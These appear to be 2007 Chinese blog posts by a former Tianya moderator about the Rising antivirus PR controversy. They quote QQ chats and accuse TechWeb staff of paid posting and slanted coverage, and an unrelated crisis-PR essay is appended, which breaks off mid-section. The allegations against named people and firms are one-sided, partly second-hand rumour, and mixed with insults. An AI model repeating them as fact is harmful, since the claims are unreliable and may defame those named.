很快,徽剑发现很多枪手进来捣乱,于是徽剑封了两个捣乱的ID,同时在QQ上说

徽剑 11:32:03

你最好管好你那些枪手,当心他们在天涯的ID

徽剑 11:32:57

不要在外面攻击天涯社区

QQ_时报丁香 11:34:26

我看看去。

(徽剑备注:这里又有意思,这里没有回答说“不关我事”,而是直接去了解情况了,这是什么人做的,等会大家可以看到后面是如何抵赖的)

徽剑 11:34:44

我当初那样出于好意支持你们,结果你们还这样搞,让我极其失望

QQ_时报丁香 11:35:28

汗了。

徽剑 11:35:41

作者:童话165 回复日期:2007-5-24 10:56:28 

  http://forum.techweb.com.cn/view ... =page%3D1#pid728795

  天涯版主做网络公关,天涯不再中立

2007-05-25日,徽剑不再担任天涯社区斑竹,这是徽剑在QQ上的聊天记录:

徽剑 13:23:20

终于认识了你们是什么样的人

徽剑 13:23:53

一群垃圾

QQ_时报丁香 13:24:18

汗。别把我扯进去好不? (徽剑备注:对照一下前面)

徽剑 13:24:54

你不用解释,是你们一起的人

QQ_时报丁香 13:24:56

你做事情,要调查清楚。说出话来要负责。

QQ_时报丁香 13:25:36

我们一起?你说清楚吧。谁和我一起了,你看我和谁一起了。? (徽剑备注:对照一下前面)

徽剑 13:25:51

你们都忘了,当初你们的帖子是谁加红脸,谁推荐的了

QQ_时报丁香 13:25:57

我对你非常尊敬,还给你建立了两个群。

QQ_时报丁香 13:26:02

你以为我是玩呢?

徽剑 13:26:53

为了不影响天涯的争议,我现在不干斑竹了,

QQ_时报丁香 13:27:08

加红的,是我。不是别人。拜托别一竿子把全船的人都打下谁。

徽剑 13:27:10

但是我会坚持将瑞星彻底批下去

QQ_时报丁香 13:27:44

那是你的事,和我没关系。

QQ_时报丁香 13:27:55

我是QQ的人。只为QQ说话。

(徽剑备注:扯上QQ了,徽剑从来没有见过这位如何帮QQ说过话)

徽剑 13:28:15

你也不用解释了

QQ_时报丁香 13:28:15

我的文章或者我的言论被人利用是他们的事情。和我没关系。

(徽剑备注:对照一下前面,前面我还以为她要去管理一下那些马甲)

徽剑 13:28:24

解释太多是多余

QQ_时报丁香 13:29:22

该说的,我自然要说。不该说的,我不会说。你爱怎么批是你的事。我只能说很遗憾。

徽剑 13:30:19

对于我来说,对于瑞星来说,又是一个话题

QQ_时报丁香 13:33:38

还是那句话,随便你吧。BBS是自由的。博客是自由的。没人禁止你,我,他们言论。

不管世事如何,我把你当作朋友。至于你怎么看那是你的事。来北京了,我请客吃饭。

徽剑 13:41:12

你可以转告他们

第一,我会继续加大力度批评瑞星,同时在其他几个社区去批瑞星。

第二,虽然现在我不是斑竹,但是现在的斑竹和编辑都是我哥们。

第三,让瑞星学着好好做人,多干事,少干其他的

QQ_时报丁香 13:42:11

一条也不转达。因为和我没关系。如果抨击QQ。那和我有关系。如果不抨击,我就不管。

徽剑 13:42:43

反正我话已说到,

QQ_时报丁香 13:43:19

别和我说。没用。

徽剑 15:12:45

一群垃圾,

我已经把你拉入黑名单了,已经别联系了,我不想跟垃圾来往

看完了,大家有什么感想呢?

一个连公关老底都露出了,后面却不敢承认,居然在techweb发帖,把徽剑形容成了攻击瑞星的“幕后黑手”,这里,徽剑是受宠若惊,居然把徽剑跟周鸿祎并谈,徽剑自认在互联网界入行较早,资格是有点,但是绝对达不到周鸿祎的档次,这是起码的自知之明。

关于瑞星的幕后黑手,恐怕就有点笑话吧,前几天瑞星还在大讲“卡巴如何不好”、“诺顿如何不好”、“瑞星如何好”,现在别人就攻击来了?

那么别人攻击了瑞星那里呢?

第一,瑞星的自我宣传是如何搞笑:

“有人说:诺顿“误杀”用户为什么没有想到给赛门铁克打电话投诉,倒想起给瑞星公司打电话求救呢?”还是那句话:“徽剑问一下:你买了戴尔的电脑出了问题,你会打电话给联想,问问如何处理吗?”

补充一句:“用户用瑞星出了问题,会找江民吗”。

第二,瑞星还是原来的瑞星吗?自从老刘走了后,瑞星的技术就很搞笑了,看看我的帖子,这是一位曾经开发过杀毒软件,而且一直关注杀毒技术的系统分析员写出来的,虽然已经很少写代码,现在恐怕连那些才学了几个月的程序员都比徽剑写的快,但是对于技术原理、对于算法这些徽剑可没有忘记过。你瑞星的技术人员敢出来公开指出徽剑那点写错了吗?

第三,瑞星的公关是不是太低级了,凡是所有说卡巴和诺顿好的都是他们的马甲,马甲也太多了吧,天涯社区本来就有一大帮凑热闹的人,喜欢顶几下帖,这些人也是马甲?能不能提高点档次,不要以马甲来应对一切,要记住群众的眼睛是雪亮的,就算是马甲,说得对也是真理。

第四,凡事扯上周鸿祎也太搞笑了吧,难道中国互联网只有周鸿祎一个流氓?只要与周鸿祎扯上点边就与他有关?有直接证据吗?周鸿祎天天吃鱼肉米饭,难道现在大米和肉类上涨也与他有关?周鸿祎也买房子,难不成中国房价是他策划出来的?难不成也来个“也许有”、“莫须有”?没有直接证据就不要说任何人!否则那是诽谤。徽剑尽管批评周鸿祎,但是绝对不会把所有事件都扯过去,因为那样就是胡说八道。

第五,徽剑本人确实在帮一些企业做公关,但是徽剑没有利用过手里的职权,而且有公关常识就应该知道,做公关难道就只在一个网站做?何况天涯不是专业It网站,一做公关起码也是几个网站联动吧,那你们看见了那个?徽剑在IT视界上发过公关稿,但是那全都没有推荐过,当斑竹期间,徽剑没有给自己的任何文章加过红脸,只是加了绿脸(这里解释一下,天涯的规定是加红脸表示斑竹推荐阅读,加绿脸表示网友推荐阅读,层次上是差了一个级别),但实事求是的讲,徽剑加绿脸的文章那篇不够加红脸?就连几篇公关稿水平都够的上推荐,徽剑给考拉网写的一篇公关稿,天涯没有任何推荐,结果呢?新浪财经频道首页推荐,还有财经人士加了联系来交流。说句实话,徽剑的公关稿都够瑞星的公关们当教材了。记住徽剑讲过的一句话:“高度决定影响力”,瑞星,跟着学点!

第六,在这次天涯事件上,徽剑一开始的出发点是,把这件事在天涯炒起来,但是光有一派之言是不行的,必须对等。一边倒是没有用的。从年初担任斑竹以来,徽剑确实在天涯IT视界操作了某些影响全国的IT热点,所以秉承一贯操作方式,徽剑在开始的三篇文章中全部加粗加红吸引关注,这样形成争议局面,结果瑞星的公关们跑来一边倒,弄得这三个帖子不像话,网友进去后没有看头,全是瑞星的广告,作为论坛绝对不行,所以徽剑就决定写一篇关于瑞星的文章,补充一下,改变这种一边倒的局面,本来徽剑是要写阿里巴巴的,临时改了。写出这篇。徽剑非常荣兴,这篇文章成了所有批评瑞星中最有力的一篇,这对瑞星有比较致命的杀伤力。

第七,经过瑞星这么一折腾,徽剑不担任IT视界斑竹了,但是却要多谢瑞星,因为他们在techweb 等地方一折腾,结果一下午就有三家公司来找徽剑做公关,原来一个星期也没有三家找上门来,估计后续还不少,去掉一个没工资的斑竹,带来一大笔业务,这买卖很值啊。而且说实话,徽剑自己也认为担任IT视界斑竹不合适,因为那样缩手缩脚,写东西的时候放不开,当初是碍于情面才去担任斑竹。不过徽剑准备过几天闲下来去申请另外一个版面的斑竹,有可能是房产观澜或者天涯杂谈,因为徽剑最近写了《深圳十八摸》,所以最近南方都市报编辑正在约徽剑写时评。

附言:这里不妨公开一下IT公关方面,徽剑写稿的标准是千字千元起价,最低3000字起,不包括发布费,同时文章由徽剑决定如何写,不接受指手画脚,因为如果您那么清楚,您干嘛不自己写?网络事件策划费用是2万起价,不包括执行费用。如果担任网站运营顾问的价格视网站有钱与否而定,创业初期的每月4000起(创业艰难啊),拿到VC的1万起。别跟徽剑讲价,徽剑可以保证的是绝对只会让你钱花的超值,要不然徽剑如何还在这行混啊,好歹有点小名气。在深圳以外地区加付交通费。

第八,奉劝各大媒体,不要为了点钱就胡搞,腿夹紧点,这次事件中几个门户网站表现很有意思,搜狐是两方都有,势均力敌;新浪主要是瑞星说话;网易比较搞笑,先是屏蔽了批评瑞星的,然后一看网上全是批评瑞星的,于是又全部放出来了。在IT网站方面,techweb表现让人失望,论坛是自发的不去考虑,但是首页等是编辑推荐的,结果全是帮瑞星说话,没有对立意见,techcn表现不错,基本都是网友表达意见。至于其他的,就不用说了。

第九,至于为什么会把瑞星扯上王八,是因为徽剑前天看到一老太太买了一对王八,价格居然跟现在瑞星的促销价一样,就想到一起去了
徽剑IT点评:techweb在这次瑞星事件中扮演的角色大起底

一、本来以为17beta的传闻是空穴来风

二、一个枪手现形带来的有趣信息

三、回头看看techweb这几天的表现

四、顺我者无恙。逆我者栽赃

五、老祝同志,能解释清楚吗

一、本来以为17tech 的传闻是空穴来风

原来曾经看到这样的文章:“17Tech 03月30日消息:3月29日晚,中国第一DIGG网站17Tech获悉一份《千钧万博信息技术有限公司公关事业部发展规划》文件,文件显示Techweb祝志军规划利用现有资源,开展公关业务。据消息人士介绍,目前负责公关业务是的Techweb副总裁程天宇,公关部有20名员工,初期客户有4-6个,如瑞星、搜搜客等。“他们(Techweb)这样做也是为了解决收入问题;运作手法是通过Techweb网站和瑞星威逼和勒索企业,先发目标客户的负面消息,然后等企业找上门后,再收保护费。”此外,因Techweb主要投资人为瑞星副总裁毛一丁,毛一丁通过卡卡威胁“流氓软件”厂商,把广告资源洗到Techweb。他说:瑞星成为Techweb客户,就是毛一丁洗钱的结果。而最新客户搜搜客,也是在毛一丁利用瑞星卡卡资源在推广换来的资源。”

为了证实这报道的真实性,文章中还展示了几张图片,指称这是 techweb的会议演示文档。这篇文章在网上传播开后,techweb的祝志军发表了回复. 称Techweb不当缩头乌龟:

“第一、techweb没有什么公关部门,更没有什么公关部门业务规划书。techweb的PPT,从来不是此种格式。从头到尾,纯属捏造。该网站在某些人指使下,最近一段时间,每天捏造事实,玩弄辞藻,对techweb以及其他公司进行肆意攻击。techweb不受这种威胁,也不会交给他们要的所谓保护费。

第二、techweb以及祝志军本人从来没有威胁过任何公司,从来没有以威胁为手段收取什么一些人所说的企业保护费,业内有极个别的网站,以此种方式赚取所谓的收入,那是他们的事情,别以为天下人都跟他们一样。

第三、techweb跟瑞星的合作完全是正常的商业广告合作。在techweb发布广告,那是认同techweb的广告价值,techweb从来没有威逼利诱任何一家企业进行商业上的合作。

第四、由于该网站属于地下网站,查不出来所谓公司归属,找不到起诉对象。未来Techweb保留法律诉讼的权利。在此仅以声明形式处理。”

大家本着对祝志军的个人品牌的信任,慢慢地这消息也就没了。不过最近瑞星事件爆发后,techweb的表现确实让人从新提出了疑问。

二、一个枪手现形带来的有趣信息

要从开头说起,一个瑞星枪手的显型,结果带来很有趣的信息,徽剑于是沿着这条线查了下去。关于这位枪手大家可以去看徽剑的另一篇文章:

原天涯斑竹徽剑谈瑞星的公关们的内幕

/html/com/20070526/125.html

这位枪手名叫QQ_时报丁香,口口声声说自己是QQ的,大家看看回复,虽然她没有声明自己是腾讯人员,但是一个强烈暗示大家都会感觉到。

QQ_时报丁香 13:27:55

我是QQ的人。只为QQ说话。

QQ_时报丁香 13:42:11

一条也不转达。因为和我没关系。如果抨击QQ。那和我有关系。如果不抨击,我就不管。

一开始有徽剑和其他网友一样,在这种暗示下还以为这位真的是腾讯的员工,后来一位在国内知名IT网站的编辑告诉徽剑,

********* 09:32:47

她是老祝的员工,在TW新办公区上班

********* 09:33:08

诶~~~你~~~好歹倒是先调查一下啊

********* 09:33:46

她的直接领导应该是程天宇,也就是牛角尖

********* 09:39:35

简单的说,她只是利用QQ时报这个平台,为自己积累人脉,做公关,她还不够资格

********* 09:49:23

每个媒体都发瑞星公关稿,你不知道?

原来这位居然是techweb的员工了。再对照徽剑在原文中分析的:“这些ID回帖的时间贯穿了整天,中间间隔很小,如果考虑区别的地方看贴的时间,也就是说他们整天都在关注这个帖子,正常人不会上班干活吗,一整天都为了回复一个帖子?”

大家能够发现什么?

一个techweb的员工能够在上班时间整天帮瑞星发帖子,这里面有什么南北?

三、回头看看techweb这几天的表现

徽剑在回头对比一下techweb这些天来的表现,终于明白了点什么了!

我们先来看看techweb论坛上的一些帖子,徽剑从techweb 论坛的传闻和业界里面随便找了一下,统计出来给大家看看:

这里将帖子按时间列出来:

卡巴斯基6言不由衷 livelan22 07-5-17

诺顿误杀导致系统崩溃 中文企业版用户成重灾区 cmsnews 07-5-18

投票:诺顿“误杀”谁之错!1 2 52vc 07-5-18

诺顿出最严重“误杀”事故 可致系统崩溃 cmsnews 07-5-18

误报病毒的事情在杀毒软件市场非常普遍!!! 匿名 07-5-19

我们应该团结一致,强烈抗议,强烈反对!索赔.... 匿名 07-5-19

518事件 投个票吧 匿名 07-5-19

诺顿的今天就是卡巴斯基的明天 匿名 07-5-19

纳闷:瑞星和卡巴斯基哪个好啊? 匿名 07-5-19

律师说:用户可以对赛门铁克方面提出索赔。 匿名 07-5-19

针对本次诺顿误杀系统文件后的补救办法!!(非先前网上所说办法) 匿名 07-5-19

卡巴斯基:已提供相应修复方案 匿名 07-5-19

诺顿分析员亲口认错 Only affected Chinese 匿名 07-5-19

诺顿误杀导致系统崩溃 数百万电脑面临灭顶之灾 匿名 07-5-19

诺顿昨天下午的上海技术支持一直没有人接电话。 匿名 07-5-19

诺顿系统崩溃后的解决办法: 匿名 07-5-19

强烈鄙视诺顿,为何这次事件只针对简体中文版? 匿名 07-5-19

诺顿误杀造成严重损失,要求赛门铁克赔偿的进来!联名! 匿名 07-5-19

鄙视下诺顿 匿名 07-5-19

来看“诺顿”事件前后卡巴死机的丑恶嘴脸!匿名 07-5-19

卡巴斯基把瑞星卡卡当病毒杀 大量用户无法升级cmsnews 07-5-19

卡巴斯基误报率为零? 病毒评测机构还能信谁? 骑狮下江山 07-5-19

诺顿的今天就是卡巴斯基的明天 techwebhao 07-5-19

金盾防火墙公司,是天使还是魔鬼?1 2 byrzx 07-1-29

想知道:如果杀毒软件都耍流氓 世界会怎样1 2 一落洼地 07-5-19

面对霸道的卡巴斯基,我想起了毛 主 席 匿名 07-5-20

支持瑞星雄起,把卡巴斯基干掉!!! 匿名 07-5-20

廉颇老矣,尚能饭否? 年迈赛门铁克误报的技术层深度分析 菲菲雨欣 07-5-21

卡巴互联网安全套,笑死俺了 loothinker07-5-21

卡巴斯基与诺顿一样误杀Windows 已在台湾承认 匿名 07-5-21

卡巴自杀了 匿名 07-5-21

从诺顿走向乱炖 匿名 07-5-21

Norton也会犯这么低级的错误 匿名 07-5-21

好久没看杀毒市场这么热闹了,玩的开心,哈哈。 JamesBond 07-5-21

支持中国瑞星,卡巴死机滚出中国! 匿名 07-5-21

调查一下:诺顿误杀,有多少人中招了? 匿名 07-5-21

【原创】瑞星天下无敌!!! 匿名 07-5-21

网友解读:卡巴斯基“灭口门”的官方声明战的传统 匿名 07-5-21

卡巴斯基将瑞星卡卡当病毒干掉,有图为证! 匿名 07-5-21

没了王峰,金山就要垮掉了1 2 天山客 07-5-21

诺顿的今天就是卡巴斯基的明天 匿名 07-5-21

杀完瑞星卡卡,卡巴斯基又把QQ杀掉了…… 匿名 07-5-21

卡巴斯基“暗杀”瑞星 匿名 07-5-22

卡巴斯基重大误杀事件(2006.11-2007.5) 匿名 07-5-22

俄美联军杀戮中国,抵抗还是妥协? 闲山居士 07-5-22

从误报门和灭口门看诺顿卡巴的危机公关 JamesBond 07-5-22

卡巴斯基不顾承诺 在新浪BLOG大打出手 匿名 07-5-22

杀软误报的进一步启示 菲菲雨欣 07-5-23

卡巴误杀误报率如此高,你认为原因是什么 52 07-5-23

越来越好玩,瑞星限时卡巴斯基认错道歉 匿名 07-5-23

[转载]奇虎离职员工曝光卡巴斯基作弊之谜1 2lsj5492 07-5-24

25号以后没有发现

上面就是徽剑找的在 techweb上业界和传闻这两个版块关于这几天有关杀毒软件的帖子,可能会有个别遗漏,但是基本都在这里。

我们从数量上看,基本都是批诺顿和卡巴斯基的,也有一篇批金山的,而且不少从标题就可以看出是站在瑞星的利益角度来说话的。

从5.17日开始,19日和21日是个高潮,很有意思的是,中间居然出现了一个谷底现象,20日居然只找到了2篇,出现了双驼峰,依徽剑多年的互联网观察经验,如果是网上原发的高潮,其曲线应该是单驼峰型的,有人会说20日是周日,大家休息啊,但是徽剑提醒大家注意,19日也是周六啊,全国大部分地方都是放假的,出现十倍的出入似乎不大可能吧?更重要的是,这个高潮来的太快,去的也太快。大家可以注意,互联网上的高潮都是来的一般都比较慢,去的更慢,比如前不久的**户事件,徽剑在网上看到那幅照片有差不多两个月后,才在网上出现相关热点。难道在techweb上面出现了个特例?

徽剑后来一想,有两种可能,一是同期有人也发了杀毒软件的帖子,结果被删除了。第二种就是真的出现了“特例”,网民周六都在关注,周日基本都去玩了,周一有一部分来关注了。那么我们就来看看这两种情况意味什么:

第一种可能:同期也有人发了其他杀毒软件的帖子,被删除了。对照一下大部分帖子的倾向性,这代表一个什么信号,这些公开的帖子对谁不利?回答是卡巴斯基和诺顿,对谁有利,回答是瑞星。

Techweb作为一个以业界评论为主的网站,作为一个评论的平台,这样做是不是操纵话语权,强奸民意?也许有人会说,大家对国外软件都不满,难道大家都对于瑞星满意吗?哪样的话江民和金山怎么还有市场啊,金山和江民也在批国外软件,为什么没有他们的话语权表达?很搞笑的是居然还出现一个批金山的帖子,难道访问techweb的网友都不用金山和江民?

有一件事似乎可以证明:徽剑一朋友将那篇说明文章:“原天涯斑竹徽剑谈瑞星的公关们的内幕”发布上去,结果很快被删除到回收站里了。反之前几天一篇编造的攻击徽剑的文章却可以在上面大摇大摆的放着。

第二种可能,稍微动点脑袋都会发现这里面的可笑,周六大部分网民已经放假,周一全部上班,居然周六发的帖子比周一还多? 看看帖子标题,有意思的是,5.19日周六的帖子大多是以评论性的居多,5.21日周一居然是以几篇简单的骂文了事。难道有水平的评论人员全都在周六写?5.22日更搞笑,基本没“原创”了,都是从别的地方转贴而来了。

5.24号冒出一篇文章很搞笑:奇虎离职员工曝光卡巴斯基作弊之谜

"2007年5月23日午,网易科技频道发了一篇名为《瑞星称卡巴斯基为误杀之王 限其12小时内认错》的文章,其中附带了一个小调查:在瑞星与卡巴斯基事件中,你支持哪一方?文章一经发布,就引起很多网友的关注。因为涉及到卡巴斯基误杀QQ,在很多QQ群里面QQ网友对此讨论热烈。其中腾讯新产品Q吧交流群里面讨论更是火爆。

有网友发现瑞星的投票支持率领先卡巴斯基1000余票。其后,该网友去吃中午饭。等一个多小时后他回来再去看网易投票结果,发现短短一个多小时之内,瑞星的网友投票总数被卡巴斯基网友投票总数超了1700多票,其增长速度实在让人咂舌!

该网友后来查阅资料,发现国内杀毒软件个人用户市场占有率据权威部门统计,瑞星占据单机版60%多市场,江民和金山各占15%左右,而卡巴斯基在个人杀软市场绝对不足10%。瑞星的优势在个人用户,而卡巴的优势在一些学生和计算机伪高手中--在一个多小时之内如此惊人的增长速度实在让人奇怪!

他将这件奇怪的事情说给了一个朋友,这位朋友久历互联网的种种恩怨,曾经在奇虎公司任职过一段时间,对奇虎公司倡导“口碑营销”有着深刻的认识。他做了如下的解释。

网络投票产业链操作

奇虎离职员工说:目前网络上有一些组织和公司,专门组织网友对一些网站发布的投票活动进行公关,人为的操作投票结果,大规模的采用投票软件、招聘大批网络兼职网友等手段,每天24小时不停的进行投票操作,别说是一小时变换不同IP地址投两三千票,就是投个十万二十万也是可以做到的!

一些公司和个人为了达到增加自己支持票数的目的,常常会雇用这些网络投票组织,并支付相关费用和报酬,一般来说,一个网友用专门制作的投票软件连续工作12个小时(只是开着电脑,无人值守),可以得到10-20元人民币的报酬,有的时候还会更多。而且这些组织的运作相当神秘,一般网友是不会知道这些组织的存在的。网易科技频道的“瑞星和卡巴斯基”的投票比例匪夷所思,就是奇虎公司在用投票软件操纵的结果。

知道了上面的这些事情对于23日中午卡巴斯基投票的迷惑终于可以解开了,而且目前奇虎“口碑营销”搞的如火如荼,而卡巴斯基又与奇虎有着剪不断理还乱的美好关系,我们可以理解“网络投票产业”会随着“口碑营销”的发展而更加成熟,会产生更高的利润!

网络投票何时才能投出真实?"

看到没有,帽子扣到周鸿祎头上了。徽剑提醒大家注意徽剑在上一篇文章中写了一个现象:“第八,奉劝各大媒体,不要为了点钱就胡搞,腿夹紧点,这次事件中几个门户网站表现很有意思,搜狐是两方都有,势均力敌;新浪主要是瑞星说话;网易比较搞笑,先是屏蔽了批评瑞星的,然后一看网上全是批评瑞星的,于是又全部放出来了。在IT网站方面,techweb表现让人失望,论坛是自发的不去考虑,但是首页等是编辑推荐的,结果全是帮瑞星说话,没有对立意见,techcn表现不错,基本都是网友表达意见。至于其他的,就不用说了。”

徽剑在这里提醒大家,写此文的时候,徽剑并没有注意到 techweb有什么不对的,只是当一般情况描述了一下。大家注意这个:“网易比较搞笑,先是屏蔽了批评瑞星的,然后一看网上全是批评瑞星的,于是又全部放出来了。”

对照一下网易科技的投票,您明白了为什么票数显示不同寻常了吧。

看看里面的一个回帖:

“都说卡巴斯基好。。。可我用后很苦恼,设置不是一般的麻烦,提示操作简直太多了,智能化方面不如意。。。你们是怎么设置的?”

徽剑问一句,这位真的用过卡巴斯基吗,卡巴斯基安装完有默认设置,你不动他都可以正常工作了,连升级都是自动的。这位使用者眼睛有问题吧,把其它软件看成卡巴斯基了吧?

这样的内容在上面的这些帖子里面比比皆是。要知道techweb是一个专业IT评论类的论坛,使用者大多是搞IT的,没有几个是计算机菜鸟的,会傻到发这样的评论吗?

对照一下techweb的首页,徽剑原来说过:“在IT网站方面,techweb表现让人失望,论坛是自发的不去考虑,但是首页等是编辑推荐的,结果全是帮瑞星说话,没有对立意见”。

这种种说明了什么问题。Techweb的编辑立场有问题吧。

四、顺我者无恙。逆我者栽赃

这次techweb里面还出现了很多批评其他论坛或网站的帖子,徽剑发现一个有趣的“巧合”,所有偏向瑞星的网站,比如天极等,在这几天没有什么批评,反之,保持中立或者批评瑞星的网站,这几天都受到了批评。

新浪、搜狐评论里面很多网友批评瑞星,结果呢?

“新浪、搜狐的新闻评论审查究竟有多严格?根本无言论自由 gaore 07-5-25 ”

新浪博客出现了一些批评瑞星的文章,于是

“新浪博客遇到瓶颈,开始搬搜狐、网易和MSN的 1 2 3 andyou 07-5-25”

搜狐重点组织了一个较为客观全面的报道,就有:

“搜狐为什么不能做到巅峰 1 2 阶级兄弟遍天下 07-5-24 ”

“编辑素质低/销售能力不强/技术员白搭,搜狐出路在那? facebookinchina 07-5-24



新浪IT业界里面没有删除一些批评瑞星的文章,看看这个:

“新浪IT业界tto123拿了奇虎联盟多少钱 尾巴狠短 07-5-21 ”

赛迪发了一篇建议国产软件多提高自己水平的编者按,帽子来了:

“赛迪招清华学生,软件开发月薪仅千元 newsdaily 07-5-24 ”

这里来说说本人,本人在天涯社区IT视界担任斑竹,在这次事件出来的时候,出于论坛话题需要,加红了三篇文章,其中两篇是支持瑞星的,一篇是批评瑞星的,后来瑞星的枪手把帖子搞得不像话,不好好说话,不断骂人。徽剑先是通过QQ对它们发出警告,结果他们不以为然,徽剑于是就写了那篇《关于瑞星的彻底批判,一只老甲鱼的末路狂奔》http://www6.tianya.cn/publicforum/Content/itinfo/1/65523.shtml

发出去后瑞星的枪手还是进来捣乱,徽剑于是封了两个ID,于是得罪他们了,不到一个小时,在techweb 上面就出现

“天涯版主做网络公关,天涯舆论被强奸 少爷 07-5-24 ”

很快在投诉版也出现投诉帖,出于天涯形象的考虑,徽剑不再担任斑竹。

那里知道,这篇文章徽剑发给了《搜狐博客》、《新浪博客》、《网易博客》、《赛迪博客》、《天涯社区IT视界》、《博客中国》等几个地方的徽剑自己的博客。由于这篇文章写的比较全面深刻,结果不到一天,网上到处都被转载。于是第二天又冒出一篇《在社区攻击瑞星的幕后写手初步露端倪1 2 3 少爷 07-5-25》,还是在techweb首发,而且到处跑到转贴徽剑原文《关于瑞星的彻底批判,一只老甲鱼的末路狂奔》的后面去跟帖,想把徽剑是周鸿祎的枪手这个帽子给扣上,结果这次是彻底激怒徽剑,于是就有了徽剑揭露瑞星公关老底的文章《从QQ记录看看瑞星的公关们的嘴脸》,有的地方标题为《原天涯斑竹徽剑谈瑞星的公关们的内幕》。

曝光后,瑞星的枪手先是装出可怜的样子,试图软化徽剑,一见徽剑不吃这套,马上跳起来要告徽剑。徽剑的回答就是:“要告随便”,同时徽剑不担任IT视界版主,说话更方便,会见一个口号就是:“将批评瑞星行动进行到底”。

徽剑本来对于瑞星事件没有任何立场,开始只是出于斑竹的职责,提出出一些要求,比如:“要活跃版面”、“帖子要有可读性”等,瑞星的公关们一意孤行,在徽剑看到这些无法阻止软件公关的一边倒发帖的时候,于是写出了那篇《瑞星、甲鱼》的文章,这时徽剑都是一种交流的心态,哪知瑞星的公关把苗头引向徽剑个人,这才导致了新的彻底曝光瑞星公关的文章出现,已及现在这篇,接着还有数篇。

五、老祝同志,能解释清楚吗

对于techweb,徽剑当初如同很多IT业内人士一样,抱着对donews的失望来支持techweb,可是事到如今,看看 techweb 的各种表象,已经里面折射出的隐约内幕,不能不让人彻底失望。

这里有几个问题

一、 techweb员工“在工作时间”,使用“QQ论坛的身份”,来大量发布瑞星的公关软文,这究竟是个人行为还是职务行为?

二、 techweb的论坛出现“支持瑞星,打击卡巴和诺顿”的一边倒的“话语霸权”,拒绝发表不同意见的文章,这究竟是斑竹的个人行为还是techweb 的企业行为?

三、 techweb的首页、频道等地方的报道以“压倒性优势”来发表大量“支持瑞星,打击卡巴和诺顿”的文章,这究竟是编辑的喜好还是techweb 的企业行为?

四、 大多数“支持瑞星,打击卡巴和诺顿”的文章都是最先出现在techweb,这究竟是巧合还是必然?或者说有什么含义?

还有一些问题,徽剑懒得提了,这里只想说一句:“老祝同志,能解释清楚吗”

防范来自网络深处的袭击

防范来自网络深处的袭击

传统媒体由于其一向在民众心目中扮演的舆论监督的角色使然,使其拥有强大的舆论引导权力,其对事件的报道角度、报道口吻往往影响着民众对于企业或品牌 的判断.而在大部分民众心中,网络媒体只是传统媒体的附属,其信息来源并不具备独立的制造体系,而且由于许多信息的来源完全是开放式管理,各种各样的消 息、秘闻、传说、捕风捉影的东西充斥其中,可信度值得怀疑.

随着网络对生活的改变,网络媒体发展的迅速变化,网络媒体在舆论影响上的权力得以倍数增长.当我们翻阅2006年那些轰动一时的危机事件时,非常明显可以看出,每一次轰动一时的危机事件都是由影响力巨大的传统媒体曝光而引起:中央电视台曝光欧典地板,引发信任危机;《国际金融报》报道芝华士勾兑事件,引发洋酒第一危机案;《第一财经日报》报道富士康工厂恶劣对待工人,引来全国上下对富士康公司的一致谴责之声……

  传统媒体由于其一向在民众心目中扮演的舆论监督的角色使然,使其拥有强大的舆论引导权力,其对事件的报道角度、报道口吻往往影响着民众对于企业或品牌的判断.而在大部分民众心中,网络媒体只是传统媒体的附属,其信息来源并不具备独立的制造体系,而且由于许多信息的来源完全是开放式管理,各种各样的消息、秘闻、传说、捕风捉影的东西充斥其中,可信度值得怀疑.

  网络危机杀伤力迅速浮现

  前一阶段引起全社会都高度关注的重庆“最牛钉子户”事件,肇始也是因重庆网友将相关图片放上天涯社区而引起关注.在2007年3月,一篇声讨某国际品牌翻新机的小帖子引起了许多网络媒体和平面媒体的集体关注,为什么网上的一个小帖子有如此大的力量?

  该品牌虽然第一时间知道此篇网络帖子的出现,但是对其所可能带来的危机影响却大为忽视.对该品牌而言,只有正规的媒体、正式的新闻报道式的批评才算是对企业有影响的危机事件,而像网络BBS上这种可能是恶意攻击的帖子,该品牌方面置之不理,危机公关应对策略也迟迟不见启动,导致了此次危机发展一发不可收拾.

  前瞻2007年危机事件发展趋势,网络媒体将更进一步摆脱作为传统媒体附庸的角色,其信息来源更显独立性,并从深度、广度、互动性上将大大体现出其有别于传统媒体的优势.而更多有关企业的负面报道、负面批评、负面消息将可能在第一时间出现于网络之上,BBS、博客、个人论坛、专业网站、投诉网站甚至是个人式MSN签名档之上,传统媒体将反向从网络媒体中搜集新闻素材,而去诠释、跟进、演绎、完整某一个新闻题材特别是危机事件的报道.

  防范来自网络深处的危机袭击,这将是2007年企业应对危机事件的关键要点所在.

  在当下中国这样一个高度复杂的市场环境中,消费者的消费维权意识越来越高,而企业之间竞争激烈也达到白热化程度,企业出现某些负面报道或批评性的帖子并不奇怪.重要的是,在出现这种负面报道之后,企业以什么样的姿态或态度去应对.在危机公关中,态度决定行为,行为导致结果.

  被企业忽视的长尾效应

  美国《连线》杂志的主编克里斯·安德森提出了“长尾理论”:只要存储和流通的渠道足够大,需求不旺或销量不佳的产品共同占据的市场份额就可以和那些数量不多的热卖品所占据的市场份额相匹敌甚至更大.

  长尾效应不仅可以有效地解释市场营销中许多新的现象,而对于危机事件的发生,长尾效应同样显现出惊人的概括力.虽然中国的网络媒体占媒体总数不到20%,但是80%的危机从网络媒体爆发,而且100%的企业危机有网络媒体参与.

  对于这种新的危机发生现象,任何企业都不可能忽视.在当下而言,绝对大部分企业所要关注的、监测的对象几乎都只是传统媒体,在企业领导者的思维中,只有大的主流媒体才是舆论的引导者、意见领袖的担当者,网络媒体、特别是门户网站之外的网络信息还不是企业所要监控的对象.

  但是,越来越多的影响力巨大的企业危机完全是以谁也无法预料到的方式引爆——不是主流报纸义正辞严的深入新闻报道,也不是中央电视台式严肃调查取证的焦点访谈,而是许许多多个人意见式、感受分享式、调侃式、揭露提醒式的小帖子、邮件或博客文章,使得某些事件迅速成为民众关注的焦点,并引来传统媒体的大规模介入,从央视芮成钢主播博客批评星巴克、网友天涯贴出史上最牛钉子户到此次翻新事件,我们可以明显看出这种趋势.

  在2007年的企业危机中,信息传播的长尾效应将越发明显——非正规式网络信息正是成为企业危机出现的最主要来源.网络媒体的开放性、互动性、蒙面性、全民性,使得信息来源完全是几乎无法控制的,信息的过滤难度极大,肆意的批评与攻击更为容易.而web2.0平台的出现,使“个人式媒体”开始盛行,全民皆博的时代已经到来.在一个完全可以以自我为中心的网络时代,信息传播的规则已经发生了深刻的变化——信息传播的权力、舆论的批评权力开始从机构向个人过渡,“长尾”进入主流.企业要管理的危机源头,将从个别高高在上的主流媒体,变成千千万万草根式的“长尾”个人媒体.

  构建危机天盾应对网络危机

